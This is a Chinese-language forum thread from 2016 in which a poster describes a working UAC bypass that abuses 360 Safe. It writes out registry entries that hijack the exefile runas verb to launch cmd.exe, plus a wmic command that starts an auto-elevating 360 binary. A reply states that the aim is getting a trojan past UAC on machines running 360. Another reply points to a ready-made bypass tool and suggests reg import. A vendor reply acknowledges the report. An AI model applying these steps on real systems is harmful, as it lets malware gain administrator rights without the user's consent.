老子吃屎吃多又来找茬。。

显示全部楼层 · 发表于 2016-6-29 20:46:11

老子今天下午像死鬼一样瞎逛看雪论坛上，看有人分析360绕过UAC的实现。我不懂编程，没看懂。
反正我只觉得360绕UAC不靠谱，随便就可以被别的程序利用。。别家是不是也这样？

这不，我下午一试，老方法变下照样可以。

以前那个方法是改exe关联的 runas，再运行360程序
现在老方法我试了直接弄不成功（不知道是因为系统变了还是360变了），不过再换下花样，又可以了绕过了。

还是先改exe关联的runas
[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]
@="runas"

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas]

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas\command]
"IsolatedCommand"="cmd.exe"

再运行360程序，只是不是直接运行，而是变成

wmic process call create commandline="C:\Program Files (x86)\360\360safe\SoftMgr\SoftupNotify.exe"

就可以了

显示全部楼层 · 发表于 2016-6-29 21:16:08

不用谢了

显示全部楼层 · 发表于 2016-6-29 21:56:00

十送鸿钧发表于 2016-6-29 21:16
不用谢了

我吃的正香，别烦我。

显示全部楼层 · 发表于 2016-6-29 22:11:39

十送鸿钧发表于 2016-6-29 21:16
不用谢了

不是啊，虽然楼主标题是不太好，但是你应该提醒楼主主动改标题啊，不是这样啊。

显示全部楼层 · 发表于 2016-6-30 17:08:11

不明觉厉啊。哪位给解读一下？

显示全部楼层 · 发表于 2016-6-30 17:11:07

本帖最后由 kfsz123 于 2016-6-30 17:12 编辑

一个笨鸟发表于 2016-6-30 17:08
不明觉厉啊。哪位给解读一下？

我来解释吧，就是我弄个木马怎么在装了360的机子上绕过UAC。

一般通行方法就是白名单绕UAC（百度UACME可以下到现成工具），但是碰到UAC严格模式就不行了。。

用360的好处是可以绕UAC严格模式，而且貌似win10也可以。

显示全部楼层 · 发表于 2016-6-30 17:29:35

kfsz123 发表于 2016-6-30 17:11
我来解释吧，就是我弄个木马怎么在装了360的机子上绕过UAC。

一般通行方法就是白名单绕UAC（百度UAC ...

比如在win10 64位系统下，你这一步怎么实现？

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]
@="runas"

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas]

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL\runas\command]
"IsolatedCommand"="cmd.exe"

显示全部楼层 · 发表于 2016-6-30 17:32:39

vm001 发表于 2016-6-30 17:29
比如在win10 64位系统下，你这一步怎么实现？

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]

我没用过win10
我的win7
写那个不需要UAC的管理员权限

显示全部楼层 · 发表于 2016-6-30 17:49:00

vm001 发表于 2016-6-30 17:29
比如在win10 64位系统下，你这一步怎么实现？

[HKEY_CURRENT_USER\Software\Classes\exefile\SHELL]

我明白你的意思了。

reg import
命令

显示全部楼层 · 发表于 2016-7-1 10:21:15

您好~已经提交技术同事处理。

[讨论] 老子吃屎吃多又来找茬。。

评分

本帖子中包含更多资源